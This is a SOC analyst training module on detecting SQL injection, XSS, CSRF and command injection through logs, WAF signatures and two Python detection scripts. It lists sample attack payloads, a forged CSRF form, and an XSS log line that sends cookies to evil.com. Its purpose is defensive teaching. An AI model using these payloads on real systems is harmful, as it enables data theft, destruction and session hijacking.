Web Application Attacks

XSS, SQLi, CSRF & More - Detection from the SOC Perspective

WRAP Module - Extends Web Security Training

Web Attacks: SOC Detection Focus

The Shield House web security modules teach attack mechanics. This module focuses on how to detect these attacks in logs, WAF alerts, and SIEM as a SOC analyst.

OWASP Top 10 (2021) Overview

A01 - Broken Access Control
  Users acting outside intended permissions: IDOR, privilege escalation, path traversal.

A02 - Cryptographic Failures
  Weak encryption, plaintext data exposure, deprecated algorithms.

A03 - Injection
  SQL, NoSQL, OS command, LDAP injection attacks through untrusted data.

A04 - Insecure Design
  Missing or ineffective security controls in application design.

A05 - Security Misconfiguration
  Default configs, open cloud storage, verbose errors, missing patches.

A06 - Vulnerable and Outdated Components
  Using libraries with known vulnerabilities (Log4j, Struts, etc.).

A07 - Identification and Authentication Failures
  Broken authentication, weak credentials, session hijacking.

A08 - Software and Data Integrity Failures
  Insecure deserialization, CI/CD pipeline compromises.

A09 - Security Logging and Monitoring Failures
  Insufficient logging, missing alerts, no incident response.

A10 - Server-Side Request Forgery (SSRF)
  Forcing the server to make requests on the attacker's behalf.

SQL Injection (SQLi)

T1190

Attacker inserts malicious SQL commands into input fields to manipulate database queries.

Common Payloads:
  • ' OR '1'='1                                   (always-true condition)
  • '; DROP TABLE users;--                         (destructive chained query)
  • ' UNION SELECT username,password FROM users--  (data extraction)
  • admin'--                                       (comments out the password check)

SOC Detection

  • Look for SQL keywords in URLs/POST data
  • Monitor for database errors in responses
  • Alert on UNION, SELECT, DROP in input
  • Watch for encoded variants (%27 = ')

WAF Signatures

  • OR.*=.* (Boolean injection)
  • UNION.*SELECT
  • -- or # (Comment chars)
  • '; .*-- (Chained queries)

Apache Access Log - SQLi Attempt
192.168.1.100 - - [04/Jan/2024:14:23:45 +0000] "GET /products?id=1' OR '1'='1 HTTP/1.1" 200 5432 "-" "Mozilla/5.0"

Cross-Site Scripting (XSS)

T1059.007

Attacker injects malicious scripts that execute in victims' browsers to steal session data or perform actions.

Common Payloads:
  • <script>alert('XSS')</script>      (basic test)
  • <img src=x onerror=alert(1)>       (event handler)
  • <svg onload=alert(1)>              (SVG vector)
  • javascript:alert(document.cookie)  (cookie theft)

SOC Detection

  • HTML tags in URL parameters
  • Event handlers (onerror, onload, onclick)
  • JavaScript protocol in links
  • Encoded script tags (%3Cscript%3E)

WAF Signatures

  • <script.*>
  • on\w+= (Event handlers)
  • javascript:
  • <.*on\w+=.*>

Web Application Log - Stored XSS
[WARN] Comment submitted with suspicious content: "<script>document.location='http://evil.com/?c='+document.cookie</script>"

Cross-Site Request Forgery (CSRF)

T1185

Tricks authenticated users into performing unwanted actions on sites where they're logged in.

Attack Example:
<img src="https://bank.com/transfer?to=attacker&amount=10000">
<form action="https://bank.com/transfer" method="POST">
  <input type="hidden" name="to" value="attacker">
  <input type="hidden" name="amount" value="10000">
</form><script>document.forms[0].submit()</script>

SOC Detection

  • Requests missing CSRF tokens
  • Referer header from external domain
  • State-changing GET requests
  • Unusual request patterns from users

Prevention

  • Anti-CSRF tokens (per-session/per-request)
  • SameSite cookie attribute
  • Referer header validation
  • Re-authentication for sensitive actions
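The four SOC detection bullets and the anti-CSRF token from the prevention list, turned into a runnable check. This is an added example written for this module, not code from the Shield House training material: the hostname bank.example, the list of state-changing endpoints, the server secret and the three request records are all constructed for the demonstration. The token is a per-session HMAC of the session id, validated with a constant-time comparison, and the detection function returns the indicator names that fired so a SIEM rule can key on them.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Constructed values for this demonstration: the protected site's hostname, the
# endpoints that change state, and a server-side secret that never leaves the server.
SITE_HOST = "bank.example"
STATE_CHANGING_PATHS = {"/transfer", "/change-email"}
SERVER_SECRET = b"constructed-demo-secret-do-not-reuse"


def issue_csrf_token(session_id: str, secret: bytes = SERVER_SECRET) -> str:
    """Per-session anti-CSRF token: an HMAC of the session id under a server secret.

    Deriving the token means the server stores nothing extra; a forged page cannot
    compute it because it never sees the secret, and the same-origin policy keeps it
    from reading the token out of the legitimate page.
    """
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def token_is_valid(session_id: str, presented, secret: bytes = SERVER_SECRET) -> bool:
    """Constant-time comparison so a timing side channel does not leak the token."""
    expected = issue_csrf_token(session_id, secret)
    return hmac.compare_digest(expected, presented or "")


def csrf_indicators(req: dict) -> list:
    """Apply the module's detection bullets to one request and return what fired.

    req is a constructed dict with keys: method, path, session_id, headers, form.
    A missing Referer is not treated as an indicator here, because browsers and
    privacy settings legitimately strip it.
    """
    findings = []
    state_changing = req["path"] in STATE_CHANGING_PATHS
    if state_changing and req["method"] == "GET":
        findings.append("state_changing_get")       # <img src=...> style forgery
    referer = req.get("headers", {}).get("Referer")
    if referer and urlsplit(referer).hostname != SITE_HOST:
        findings.append("external_referer")         # request originated off-site
    if state_changing and req["method"] == "POST":
        presented = req.get("form", {}).get("csrf_token")
        if not token_is_valid(req["session_id"], presented):
            findings.append("missing_or_invalid_csrf_token")
    return findings


# Constructed requests; all three carry the victim's valid session cookie.
SESSION = "sess-4f2a"
LEGIT_POST = {
    "method": "POST", "path": "/transfer", "session_id": SESSION,
    "headers": {"Referer": "https://bank.example/transfer"},
    "form": {"to": "savings", "amount": "100", "csrf_token": issue_csrf_token(SESSION)},
}
# The <img src="https://bank.com/transfer?to=attacker&amount=10000"> pattern from the text.
FORGED_GET = {
    "method": "GET", "path": "/transfer", "session_id": SESSION,
    "headers": {"Referer": "https://evil.example/page.html"}, "form": {},
}
# The auto-submitted hidden form from the text: right method, but no token.
FORGED_POST = {
    "method": "POST", "path": "/transfer", "session_id": SESSION,
    "headers": {"Referer": "https://evil.example/page.html"},
    "form": {"to": "attacker", "amount": "10000"},
}

if __name__ == "__main__":
    for name, req in [("legit", LEGIT_POST), ("img-get", FORGED_GET), ("form-post", FORGED_POST)]:
        print(name, csrf_indicators(req))
```

The legitimate request produces no indicators; the image-tag forgery trips both the state-changing-GET and external-Referer checks; the hidden-form forgery has the right method but no token and an off-site Referer. A SameSite=Lax or Strict cookie attribute would stop both forgeries before they reach this code, which is why the prevention list pairs it with tokens.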

OS Command Injection

T1059

Attacker executes arbitrary system commands through vulnerable web applications.

Common Payloads:
  • ; cat /etc/passwd    (Linux password file)
  • | whoami             (current user)
  • & dir C:\            (Windows directory listing)
  • `id`                 (backtick execution)
  • $(cat /etc/shadow)   (command substitution)

SOC Detection

  • Shell metacharacters (; | & ` $)
  • System commands in input (cat, ls, whoami)
  • Process execution anomalies
  • Outbound connections from web server

WAF Signatures

  • [;&|`$] (Shell metacharacters)
  • /etc/passwd
  • cmd\.exe|powershell
  • \$\(.*\) (Command substitution)
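The SQLi, XSS and OS command injection sections above each list WAF signatures and a SOC detection bullet about encoded variants. The following is an added example, written for this module and not part of the Shield House material, that runs those signatures over Apache access-log lines the way a SOC analyst's triage script would. The first sample line is the module's own SQLi log entry; the other four lines, the IP addresses and the parameter names are constructed. Two design points it makes that the bullet lists do not: percent-decoding must happen before matching (that is what catches %27 and %3Cscript%3E), and the shell-metacharacter signature must be applied per decoded parameter value, because the & that separates query parameters would otherwise flag every multi-parameter request.

```python
import re
from typing import Optional
from urllib.parse import parse_qs

# Signature sets adapted from the WAF patterns listed in this module, compiled
# case-insensitively. The Boolean-injection pattern is tightened from OR.*=.* to
# require a quote before OR, so a parameter name such as "sort=" does not trigger it.
SIGNATURES = {
    "sqli": [
        re.compile(r"'\s*OR\s+.*=", re.I),   # Boolean injection
        re.compile(r"UNION.*SELECT", re.I),  # data extraction
        re.compile(r"--|#"),                 # SQL comment characters
        re.compile(r"';.*--"),               # chained queries
    ],
    "xss": [
        re.compile(r"<script.*?>", re.I),    # script tag
        re.compile(r"\bon\w+\s*=", re.I),    # event handlers (onerror=, onload=)
        re.compile(r"javascript:", re.I),    # javascript: URLs
    ],
    "cmdi": [
        re.compile(r"[;&|`$]"),              # shell metacharacters
        re.compile(r"/etc/passwd"),
        re.compile(r"cmd\.exe|powershell", re.I),
        re.compile(r"\$\(.*\)"),             # command substitution
    ],
}

# Apache combined log format. The request target is captured non-greedily so a raw,
# unencoded payload containing spaces, as in the module's sample line, still parses.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)


def decode_params(target: str) -> dict:
    """Split the query string into percent-decoded parameter values.

    parse_qs decodes %27 to ' and %3Cscript%3E to <script>, and splits on '&',
    so each signature is applied to one value rather than to the raw separators.
    Only the query string is visible in an access log; POST bodies need the
    application or WAF log.
    """
    _, _, query = target.partition("?")
    return parse_qs(query, keep_blank_values=True)


def classify_value(value: str) -> set:
    """Return the attack classes whose signatures match one decoded value."""
    return {name for name, patterns in SIGNATURES.items()
            if any(p.search(value) for p in patterns)}


def analyze_line(line: str) -> Optional[dict]:
    """Parse one access-log line and tag it with any matching attack classes."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not an access-log line; leave it for other parsers
    attacks = set()
    for values in decode_params(m["target"]).values():
        for v in values:
            attacks |= classify_value(v)
    return {"ip": m["ip"], "target": m["target"],
            "status": m["status"], "attacks": sorted(attacks)}


def scan(lines) -> list:
    """Return only the parsed entries that matched at least one signature."""
    hits = []
    for line in lines:
        entry = analyze_line(line)
        if entry and entry["attacks"]:
            hits.append(entry)
    return hits


# Constructed sample log: the module's SQLi line, then an encoded UNION SQLi, an
# encoded XSS probe, a command injection, and a benign multi-parameter request.
SAMPLE_LOG = [
    '192.168.1.100 - - [04/Jan/2024:14:23:45 +0000] "GET /products?id=1\' OR \'1\'=\'1 HTTP/1.1" 200 5432 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [04/Jan/2024:14:24:01 +0000] "GET /products?id=1%27%20UNION%20SELECT%20username,password%20FROM%20users-- HTTP/1.1" 500 312 "-" "curl/8.0"',
    '10.0.0.7 - - [04/Jan/2024:14:24:09 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1204 "-" "curl/8.0"',
    '203.0.113.9 - - [04/Jan/2024:14:25:30 +0000] "GET /ping?host=127.0.0.1%3Bcat%20/etc/passwd HTTP/1.1" 200 2210 "-" "python-requests/2.31"',
    '198.51.100.4 - - [04/Jan/2024:14:26:12 +0000] "GET /products?category=books&sort=price&page=2 HTTP/1.1" 200 8800 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["attacks"], hit["target"])
```

The benign fifth line matches nothing, even though the raw query string contains & and a name ending in "ort=", which is the point of decoding and splitting before matching. The 500 status on the UNION attempt is the "database errors in responses" indicator from the SQLi detection list and is worth a second, status-based rule; the signatures alone do not weigh it.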


SOC Response Playbook

SQL Injection
  Immediate actions: Block IP, check for data exfil, audit DB
  Long-term remediation: Parameterized queries, input validation, WAF rules

XSS
  Immediate actions: Remove malicious content, notify affected users
  Long-term remediation: Output encoding, CSP headers, sanitize input

CSRF
  Immediate actions: Invalidate sessions, review transaction logs
  Long-term remediation: CSRF tokens, SameSite cookies, Referer check

Command Injection
  Immediate actions: Isolate server, forensic imaging, check persistence
  Long-term remediation: Remove shell access, input whitelist, sandboxing
